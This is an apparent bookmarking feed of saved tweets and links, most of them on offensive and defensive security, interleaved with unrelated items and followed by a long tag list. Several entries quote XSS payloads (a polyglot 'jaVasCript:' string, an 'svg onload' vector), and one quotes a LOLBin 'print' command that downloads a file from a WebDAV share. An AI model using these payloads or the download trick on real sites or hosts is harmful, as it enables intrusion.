Twitter
Frida Python Binding - easy to use Frida python binding script for Android reversing automation by
from twitter_favs
11 hours ago
Twitter
RT : Made a little tool to generate files which produce magic MD5 hashes to abuse PHP type juggling vulnerabilities (cou…
from twitter_favs
yesterday
Twitter
The new Sn1per professional reporting interface is coming along nicely! Includes sortable/searchable hosts, port li…
from twitter_favs
yesterday
Twitter
Dramáticas imágenes del Glaciar del Ródano en los alpes suizos, tapado con sábanas térmicas para evitar que continú…
from twitter_favs
yesterday
Twitter
Reverse Engineering Malware, Part 3: Getting Started with IDA Pro
malware  cybersecurity  idapro  reversing  from twitter_favs
yesterday
Twitter
RT : C++ Discovery, Reconstruction, and Decompilation for x86 files in JEB 3 Alpha - short clip here…
from twitter
2 days ago
Twitter
Learn how to implement, tweak, and scale microservices with Docker, Flask, and React! …
from twitter_favs
2 days ago
Twitter
RT : While the blog is supposed to be about exploitation, it's really a tutorial on how to quickly RE an OOP DCOM object…
from twitter
3 days ago
Untitled (https://arxiv.org/pdf/1804.06450.pdf)
Review of Mobile Apps Permissions and Associated Intrusive Privacy Threats
[PAPER]
MobileSecurity  from twitter_favs
3 days ago
Twitter
Stealing NTLM hashes with C:\windows\system32\nltest.exe on Windows 10
from twitter_favs
4 days ago
Twitter
dogs will seriously do their best to help you with anything lmao.
from twitter_favs
4 days ago
GitHub - skorov/ridrelay: Enumerate usernames on a domain where you have no creds by using SMB Relay with low priv.
RT : Enumerate usernames on an internal network domain where you have no creds by using SMB Relay with low priv
from twitter
4 days ago
Twitter
RT : Apple Safari - Wasm Section Exploit : (pdf)
from twitter
4 days ago
Twitter
Great session from and about "Hacking the cloud" - Instead of domain ad…
from twitter_favs
4 days ago
Untitled (https://www.youtube.com/watch?v=LufXEPTlPak)
Great session from and about "Hacking the cloud" - Instead of domain ad…
from twitter_favs
4 days ago
Twitter
RT : Daedalus: state-of-the-art of code obfuscation, and JS code tricks by
Slides:
Conf…
from twitter
5 days ago
Daedalus – Though the Maze of Code // Speaker Deck
RT : Daedalus: state-of-the-art of code obfuscation, and JS code tricks by
Slides:
Conf…
from twitter
5 days ago
Stored XSS on Facebook | OpnSec
RT : 3 stored XSS in facebook, documented in a great write-up by
from twitter
5 days ago
Twitter
Remote kernel debugging "lateral movement" via WMI. An example of one of the many use cases for my new
PowerShell  from twitter_favs
6 days ago
KLEE
KLEE LLVM Execution Engine
from twitter_favs
6 days ago
Twitter
Attention Gating in Convolutional Neural Networks: Applied to Medical Image Classification and Segmentation
(sourc…
from twitter_favs
6 days ago
Twitter
So, if you are running OpenBSD-current, you need to recompile *all* applications written in Go, or they will misera…
from twitter_favs
6 days ago
Twitter
RT : Look for wadl/wsdl files (also variations like "svc?wsdl", "asmx?wsdl", "/?_wsdl","/?_wadl") and parse it with too…
from twitter
6 days ago
Tags
RT : Some nice writeup you should read it.
from twitter
7 days ago
Untitled (https://pastebin.com/raw/Rf002LdV)
Doing some spring cleaning on our drives and decided to drop you this
from twitter_favs
7 days ago
Twitter
This little can download files from webdav:

print /D:c:\outfolder\outfile.exe \\…
LOLBin  from twitter_favs
7 days ago
(404) https://t.co/l9KgmGobTq%5Cfo
This little can download files from webdav:

print /D:c:\outfolder\outfile.exe \\…
LOLBin  from twitter_favs
7 days ago
Twitter
Martin Luther King Jr. got a C+ in public speaking.
from twitter_favs
8 days ago
Untitled (https://arxiv.org/pdf/1804.04014.pdf)
PowerHammer: Exfiltrating Data from Air-Gapped Computers through Power Lines
from twitter
8 days ago
Twitter
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3cs…
from twitter_favs
8 days ago
Twitter
I've uploaded a big update to my modular configuration repository. 28 changes in total. All newly published…
Sysmon  from twitter_favs
8 days ago
VirusBay
If anyone wants to play with the good old , I uploaded a bundle of its components to :
Stuxnet  from twitter_favs
9 days ago
GitHub - peikexin9/deepxplore: DeepXplore code release
RT : It looks like the code for DeepXplore, which fuzzes neural networks based on neuron coverage, is available now:
from twitter
9 days ago
Twitter
how powerful are a crocodile's jaws? well...
from twitter_favs
9 days ago
Twitter
This is what my face looks like when someone lets me hold a piece of the Moon and Mars at the same time
from twitter_favs
9 days ago
Twitter
capitalists: we need capitalism in healthcare because it encourages innovation

Also capitalists:
from twitter_favs
9 days ago
Twitter
You might know that in C
ptr[7] == 7[ptr] // because a[i] is defined as *((a)+(i))
But did you know what that…
from twitter_favs
10 days ago
Twitter
RT : Breaking CFI: Exploiting CVE-2015-5122 using COOP :
from twitter
10 days ago
Remote Hash Extraction On Demand Via Host Security Descriptor Modification
RT : Remote Hash Extraction On Demand Via Host Security Descriptor Modification : , An ACE in t…
from twitter
10 days ago
Twitter
RT : Remote Hash Extraction On Demand Via Host Security Descriptor Modification : , An ACE in t…
from twitter
10 days ago
Use Windows Event Forwarding to help with intrusion detection (Windows 10) | Microsoft Docs
RT : Use Windows Event Forwarding to help with intrusion detection (Windows 10) | Microsoft Docs
from twitter
10 days ago
OTP - MFA/2FA BYPASS
Vulnerable Online 2FA Google Authenticator App :
Easy ~
from twitter_favs
11 days ago
Twitter
Super excited to welcome the awesome as our new COO! :-)
from twitter_favs
11 days ago
Twitter
RT : Highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for…
from twitter
11 days ago
Twitter
RT : The detailed breakdown of the remote reg DACL modification work from , , and myself - "Remote Has…
from twitter
11 days ago
(500) http://codetective.py
Find secrets in code with Codetective:
python -r -d mypath -m 80 -t secrets
from twitter
11 days ago
Twitter
RedHunt OS (VM) - *Beta v1* Release is out. Feedback is welcome.
ThreatHunting  DFIR  from twitter_favs
12 days ago
Untitled (https://www.youtube.com/watch?v=OvarkOxxdic&app=desktop)
RT : The new Same Origin Method Execution talk is out with adv aspects, playground and tools:
SOMEAttack  HITB2017AMS  from twitter
12 days ago
This Optical Illusion Where Colors Disappear When You Stare At Them Is Breaking Our Brains - Digg
This optical illusion where colors disappear when you stare at them is breaking our brains
from twitter_favs
12 days ago
Twitter
The FEYNMAN technique of learning:
STEP 1 - Pick and study a topic
STEP 2 - Explain the topic to someone, like a ch…
from twitter_favs
12 days ago
Twitter
A simple guide from on how to turn indicators of compromise (IOCs) provided by security companies in…
from twitter_favs
12 days ago
Twitter
La autopsia a este cachalote varado revela que murió debido a 29 kilos de bolsas de plástico en su estómago…
from twitter_favs
12 days ago
Twitter
RT : For those who might find it interesting, just wrote a guide on how to setup a Burp Collaborator Server on a typical…
from twitter
13 days ago
Twitter
How to setup a Burp Collaborator Server on a typical Debian VPS (using free wildcard SSL certificates and your own…
from twitter_favs
13 days ago
Crayon : Crayon Programming Language
Crayon Programming Language
- Open Source Cross-Platform Game Programming
from twitter_favs
13 days ago
Twitter
RT : 2 interesting vectors by
;[].constructor.prototype.join=function(){return'pwnd'};eval('alert(1)')

im…
from twitter
13 days ago
Edit fiddle - JSFiddle
Replacing space with "•"... by
<svg•onload=alert(1)>
Test at :
from twitter_favs
13 days ago
Twitter
RT : goGetBucket - A Penetration Testing Tool To Enumerate And Analyse Amazon S3 Buckets Owned By A Domain…
from twitter
14 days ago
Twitter
RT : If you ever have to compile Python scripts to Windows executables, have a look at this Docker image. It's the clean…
from twitter
15 days ago
« earlier      
#blog #fr #hacking #homepage #js #security 00 01 02 03 05 06 0day 159460 2009 31c3 32c3 44con academic activedirectory adfsl ai alabama analysis androguard android anonym8 anonymous antisandbox antisec apple apps appsec architecture arm arp arpy art ashley aslr asm audit auditingtool awesome aws b2b backdoor backdoors backtrack backup bash belgrade beroot bheu bhusa bigdata binwalk birmingham bitlocker bittorrent blackhat blackhateu blackhole blind_sqli blog blogpost blueteam bluetooth bm book books boot boot2root bootkit bro_ids browser browsers brucon bruteforce bruteforcer bsideschallenge bsideslisbon bsideslondon bugbounty burp bypass campc canvas capstone capstoneinside captcha capture centos charliehebdo chart cheatsheet checkitout checklist chisel chrome cisco ciscotalos civ climber cloud cms cocoa code codebits codebits2011 codetainer coding colorado comedy comic conf confoo connections crack crackme crawler cronjob crossplatformdisassembler crosssitescripting crowbar crypto cryptohaven cryptoparty cryptowall csp csrf css ctf cuckoo curiosity cyber cyber_warfare cybercrime cybersecurity dahboo7 dailywtf data dataexfiltrationtoolkit datascience db dbgkit dc4420 deal deals debugger debugging decompiler deeplearning defcon defense derbycon design det detection dev devel devops dfir dfirsummit dfrws dirtycow disassembler discover diy dl dll dns doc docker dockersecurity dominator dos dropbox duqu earth eclipse elasticsearch electronics elf elixirlang emacs emet empire encryption equationgroup erlang escalating ettercap event exploit exploitation exploitkit fail fb firefox flame forensic forensics foss fr framework free freebsd fridayreads fun funny future fuzzer fuzzing game gamedev games gaming gdb geek geographyofpoverty git github gnome gnu golang google googleplay graph graphs grrcon gtd gui hack hack2learn hacker hackerone hackers hackersonlineclub hacking hackingteam hacklu hackpra hardening hardware hash hashcat heartbleed hitb2016ams hitb2017ams hitbgsec homepage honeypot howto html html5 https humor hunter icloud icon icons ida ids ie ie6 ie9 infosec infrastructure injection ioc ios iphone ipv6 ipython iso it italy itsec j2ee j2eescan jaff java javaone javascript jesuischarlie jobs jquery js jsrat jvm kali kalilinux katoolin kekeo kernel keylogger kibana lab learn leopard lfi libsigrokdecode links linux live locky lowpower lynis mac macbook machinelearning macos macosx mail maltego malware malwareanalysis malwaremustdie manager manual map math mbr metasploit microsoft mimikatz mitm mobile model modeling money monitoring moon movies movp mq msf mysql nasa neo4j netbook netsec network networking neutrinobot news nginx nginxday nmap nodejs noriben notsosecure nsa nsm ntp numpy ohm2013 oldschool oldschoolbackdoors oleoutlook ollydbg opensource openssl oprahssl oracle os oss osx owasp pacsec pandas paper password patch pdf pe penetrationtest pentest pentesters pentesting pentestlab perceptual persistence personal pestudio pgp phishing php pki plot poc poc2014 portable portugal postgresql powershell privacy privilegeescalation processexplorer productivity programming proxy pshitt pwn2own python qt quotes ransomware raspberrypi raspberrypi2 rce re realtime recipes recon14 reconmtl regex rehints rekall remcos remwa repy2exe retrogaming reverse reverse_engineering reverseengineering reversing rkt rodeoide root rop ror rowhammer ruby ructfe samba sandbox sans sanspentestblog scada scanner screencast screencasts sdo search sec14 security securitymanager seo serbia shadowbrokers shellcode shellcoding shellter slides sniffer snippet snmp snowleopard social software source sp17 space splunk sqli sqlilab sqlinjection ss7map ssh ssl starttls startups stat stats stuxnet sun suricata svg sync sysadmin syslog tbt tech terminal testbed thn threat threathunting tip tips tool tools toolswatch tor tr16 tricks trojan truestory tutorial tv tweak ubuntu ue4 uefi ui unix url usa usb usenix vault7 video videos vietnam virginia virtualization viz vm voip volatility vpn vulnerability vulnhub waf wearables web web-dev web2py webapp webdev websec websecurity webvulscan wii wikileaks win windbg windows windows8 wordpress worldphotographyday wpa wpscan writeup wxpython x64dbg xslt xss xxe yara zeronighs zeronights

Copy this bookmark:



description:


tags: